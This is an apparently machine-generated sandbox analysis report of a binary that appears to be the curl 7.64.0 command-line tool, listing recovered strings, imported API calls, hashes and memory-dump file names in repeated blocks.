                                                                                                                                                                                                                                                            • String ID: (%d) Failed writing body$<$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentione$P"-$curl: (%d) %s$t70
                                                                                                                                                                                                                                                            • API String ID: 3760120566-2420039810
                                                                                                                                                                                                                                                            • Opcode ID: 88590a5deafe74b75db16e6b4fc61527c8193c7e51c656ca75abbde478815e7f
                                                                                                                                                                                                                                                            • Instruction ID: 388dbb9c8c14e918ec233edbe7a64196a421c302ee8e3c91da1e1d920d8be4df
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88590a5deafe74b75db16e6b4fc61527c8193c7e51c656ca75abbde478815e7f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41916CF1A183419BEB24DF25C845B5BB7E4AF80308F14482DF88997291E779D968CF93
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • The directory name %s is too long., xrefs: 00233102
                                                                                                                                                                                                                                                            • Error creating directory %s., xrefs: 002330EA
                                                                                                                                                                                                                                                            • %s resides on a read-only file system., xrefs: 002330FA
                                                                                                                                                                                                                                                            • You don't have permission to create %s., xrefs: 002330D3
                                                                                                                                                                                                                                                            • Cannot create directory %s because you exceeded your quota., xrefs: 002330E2
                                                                                                                                                                                                                                                            • %s%s, xrefs: 0023303C, 0023305D
                                                                                                                                                                                                                                                            • No space left on the file system that will contain the directory %s., xrefs: 002330F2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strtok$_errnofreestrlen$_mkdir_strdupmalloc
                                                                                                                                                                                                                                                            • String ID: %s resides on a read-only file system.$%s%s$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
                                                                                                                                                                                                                                                            • API String ID: 1120732356-1086585624
                                                                                                                                                                                                                                                            • Opcode ID: 9919e545dd5262125bb7de5a650447547889775bf530abe6980083a53ac20097
                                                                                                                                                                                                                                                            • Instruction ID: 685a2693ab3bd3ea69efae80490a4511627adbb5715d647fd0cd273abce7cacc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9919e545dd5262125bb7de5a650447547889775bf530abe6980083a53ac20097
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B314AF5F242017BEA19AA255D42F7B356CCB61708F14007EFC45A6142F6D99F2482BB
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Connection time-out, xrefs: 00276DDB
                                                                                                                                                                                                                                                            • Failed to receive SOCKS4 connect request ack., xrefs: 00276FA5
                                                                                                                                                                                                                                                            • Failed to send SOCKS4 connect request., xrefs: 00276F97
                                                                                                                                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 0027706F
                                                                                                                                                                                                                                                            • SOCKS4 reply has wrong version, version should be 4., xrefs: 00276F90
                                                                                                                                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 002770A2
                                                                                                                                                                                                                                                            • SOCKS4 connect to IPv4 %s (locally resolved), xrefs: 00276E83
                                                                                                                                                                                                                                                            • SOCKS4 connection to %s not supported, xrefs: 00276FBE
                                                                                                                                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client., xrefs: 002770D2
                                                                                                                                                                                                                                                            • Too long SOCKS proxy name, can't use!, xrefs: 00276DD1
                                                                                                                                                                                                                                                            • SOCKS4%s request granted., xrefs: 00277026
                                                                                                                                                                                                                                                            • Failed to resolve "%s" for SOCKS4 connect., xrefs: 00276FDC
                                                                                                                                                                                                                                                            • SOCKS4 communication to %s:%d, xrefs: 00276D73
                                                                                                                                                                                                                                                            • SOCKS4%s: connecting to HTTP proxy %s port %d, xrefs: 00276D44
                                                                                                                                                                                                                                                            • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 00277102
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$memcpystrcpy
                                                                                                                                                                                                                                                            • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Connection time-out$Failed to receive SOCKS4 connect request ack.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 reply has wrong version, version should be 4.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$Too long SOCKS proxy name, can't use!
                                                                                                                                                                                                                                                            • API String ID: 2802800850-2867532396
                                                                                                                                                                                                                                                            • Opcode ID: 46d88674d22bca6b3e748a34ff366ab33327388029a0b2bc1268396c5ab137b9
                                                                                                                                                                                                                                                            • Instruction ID: db5bf13b1aeb1fc81217b6f65c3f4b1a1f03baf70e03af0255684915a0b9295a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46d88674d22bca6b3e748a34ff366ab33327388029a0b2bc1268396c5ab137b9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB14AB192C7916BD7219E21AC45FBB7EE88FC2309F08446DF8CD46242E1759968C7B3
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$_closefclosefwrite
                                                                                                                                                                                                                                                            • String ID: (%d) Failed writing body$P"-$t70$Hj
                                                                                                                                                                                                                                                            • API String ID: 4020199869-2496123061
                                                                                                                                                                                                                                                            • Opcode ID: 3e6cdede74b596b568dc333187362d631eca6028ebfac0140dd8b88491bfffaf
                                                                                                                                                                                                                                                            • Instruction ID: d2a5707a9c5dbdc97d9c0d85b74358defbc4dc14bb7ecb467b490e470cd4cb5c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e6cdede74b596b568dc333187362d631eca6028ebfac0140dd8b88491bfffaf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0718FF1918341CBEB289F21D84575BB7E0AF80308F14487DE88957291E77AD868CF53
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fclosefopenstrcmp
                                                                                                                                                                                                                                                            • String ID: %s$ CURL *hnd;$ CURLcode ret;$ return (int)ret;$ * All curl_easy_setopt() options are documented at:$ * https://curl.haxx.se/libcurl/c/curl_easy_setopt.html$ ************************************************************************/$#include <curl/curl.h>$%s$/**** End of sample code ****/$/********* Sample code generated by the curl command line tool **********$Failed to open %s to write libcurl code!$int main(int argc, char *argv[])
                                                                                                                                                                                                                                                            • API String ID: 3326340520-4013719026
                                                                                                                                                                                                                                                            • Opcode ID: 4db3f3d3813ea585fb5d681daac362edc724e4cefe7e1563fd30b32f85cf729b
                                                                                                                                                                                                                                                            • Instruction ID: 25b49e1eedead32fb0cd429c9ebfc250fe8d3b1e26ade9675edc8641d465688c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db3f3d3813ea585fb5d681daac362edc724e4cefe7e1563fd30b32f85cf729b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD51CFBDA6071277DE92FE10AE87F46361C5F21B08F24003AF80435247EAD98739667E
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023A201
                                                                                                                                                                                                                                                            • fclose.MSVCRT ref: 0023A233
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023A24C
                                                                                                                                                                                                                                                            • fclose.MSVCRT ref: 0023AF92
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023B116
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023B12A
                                                                                                                                                                                                                                                            • _close.MSVCRT ref: 0023B145
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E274
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 0024029F
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402B5
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402CB
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402E1
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402F7
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 0024030D
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 00240323
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 00240339
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E305
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E32F
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E341
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E353
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: free.MSVCRT ref: 002404BD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$strcmp$fclose$_close
                                                                                                                                                                                                                                                            • String ID: CURLOPT_ACCEPT_ENCODING$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTP_VERSION$CURLOPT_POSTREDIR$CURLOPT_TRANSFER_ENCODING$P"-$t-h{M
                                                                                                                                                                                                                                                            • API String ID: 3512857261-3348026860
                                                                                                                                                                                                                                                            • Opcode ID: f31187a41a64441b13556c59cfcd8c0f43f6132b04592e7fe5e851bc8e7c980a
                                                                                                                                                                                                                                                            • Instruction ID: a7234f85c5a477835eae94a391649ad910ccba85eb9d4969111f6315b14798b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f31187a41a64441b13556c59cfcd8c0f43f6132b04592e7fe5e851bc8e7c980a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 906180F1A14341ABEB249F14CC46B5BB7E1AF80708F04497DF989A6291E775DC68CB43
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: printf$putchar$strlen
                                                                                                                                                                                                                                                            • String ID: %s $2019-02-06$Features: $Protocols: $Release-Date: %s$curl 7.64.0 (i386-pc-win32) %s$b=(
                                                                                                                                                                                                                                                            • API String ID: 348636431-1300552597
                                                                                                                                                                                                                                                            • Opcode ID: 2c6c6059939948a249b2922c1f644233e1703bffc81606c83645a22f5d162f99
                                                                                                                                                                                                                                                            • Instruction ID: d2dd6cd39928dc99b42b812c421c8de94560d90d083bb964becfc77802c2231e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c6c6059939948a249b2922c1f644233e1703bffc81606c83645a22f5d162f99
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2611E7F9E00741CBDA58AA26AD83F5972405B11304F4801AAFC0A67281F26AF9E4D77E
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _fileno.MSVCRT ref: 00232653
                                                                                                                                                                                                                                                            • _isatty.MSVCRT ref: 0023265C
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00232679
                                                                                                                                                                                                                                                            • malloc.MSVCRT ref: 00232689
                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 002326A9
                                                                                                                                                                                                                                                            • _fileno.MSVCRT ref: 002326C4
                                                                                                                                                                                                                                                            • _get_osfhandle.MSVCRT ref: 002326CD
                                                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002326E0
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 002326E9
                                                                                                                                                                                                                                                              • Part of subcall function 00232510: fopen.MSVCRT ref: 00232536
                                                                                                                                                                                                                                                              • Part of subcall function 00232510: fclose.MSVCRT ref: 00232543
                                                                                                                                                                                                                                                              • Part of subcall function 00232510: strerror.MSVCRT ref: 0023254F
                                                                                                                                                                                                                                                            • fwrite.MSVCRT ref: 0023270A
                                                                                                                                                                                                                                                            • fflush.MSVCRT ref: 00232755
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00232766
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file., xrefs: 00232788
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_filenofree$ConsoleWrite_get_osfhandle_isattyfclosefflushfopenfwritemallocstrerror
                                                                                                                                                                                                                                                            • String ID: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or consider "--output <FILE>" to save to a file.
                                                                                                                                                                                                                                                            • API String ID: 3196308202-3734715646
                                                                                                                                                                                                                                                            • Opcode ID: f0ba9a8b80557cd135b42845a075d45c74d73e30cad84988bc91ee6f2b292e32
                                                                                                                                                                                                                                                            • Instruction ID: 42d38ff28c48e273d303e7aa9039e6d36330aaddafd9604f5ca516fa048a1b96
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0ba9a8b80557cd135b42845a075d45c74d73e30cad84988bc91ee6f2b292e32
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA4104B5A10301EBD714AF25DD06F5BBAA8EF44354F090479FC4897251E671ED28CBA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                                                                                                                                                            • API String ID: 39653677-3980008082
                                                                                                                                                                                                                                                            • Opcode ID: e4a2bd6e524df0d3e1cd501d38c9a69bbbdfc01ba06cb4b85fd997174b54f060
                                                                                                                                                                                                                                                            • Instruction ID: a55b01bf95bee2827a087852131a802ca5b3a769afc2346ed87cd13e9240057b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4a2bd6e524df0d3e1cd501d38c9a69bbbdfc01ba06cb4b85fd997174b54f060
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F881D370A243029FE724BF29DC84B7772E5FB80309F048539ED8986252E7B5DCA4CB91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strcmpstrncmp$strlen$strchr
                                                                                                                                                                                                                                                            • String ID: ../$/..$/../$/./
                                                                                                                                                                                                                                                            • API String ID: 1217162464-456519384
                                                                                                                                                                                                                                                            • Opcode ID: 14a20a1229a91b099b29ef87537ddad7321265047cc1bf97fa7f36e31d343223
                                                                                                                                                                                                                                                            • Instruction ID: 8452967d7978d9f9390b2fdc6098288091c6214efb645a144e3b378fb7ce26ed
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14a20a1229a91b099b29ef87537ddad7321265047cc1bf97fa7f36e31d343223
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E417C50D1428317EF21AB2E3C56B677A9C9F9232DF1C007DEC8582243F69D99B5C27A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
